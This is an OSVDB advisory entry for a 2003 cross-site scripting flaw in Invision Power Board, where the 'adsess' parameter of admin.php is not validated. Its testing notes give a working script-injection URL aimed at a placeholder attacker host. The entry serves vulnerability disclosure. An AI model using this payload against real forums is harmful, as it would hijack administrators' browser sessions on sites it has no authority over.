Invision Power Board admin.php adsess Variable XSS

2003-08-23T00:00:00
ID OSVDB:3353
Type osvdb
Reporter OSVDB
Modified 2003-08-23T00:00:00

Description

Vulnerability Description

Invision Power Board contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "adsess" variable upon submission to the admin.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, the vulnerability reporter has released a patch to address this vulnerability.

Short Description

Invision Power Board contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the "adsess" variable upon submission to the admin.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[target]/admin.php?adsess='><script>window.open (window.location.search.substring(78));</script><http://[attacker]?BoyBear$$$From$$$BinaryVision

http://[target]/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete

References:

Vendor URL: http://www.invisionboard.com/ Other Solution URL: http://archives.neohapsis.com/archives/bugtraq/2003-08/0103.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-08/0087.html ISS X-Force ID: 12860 Bugtraq ID: 8381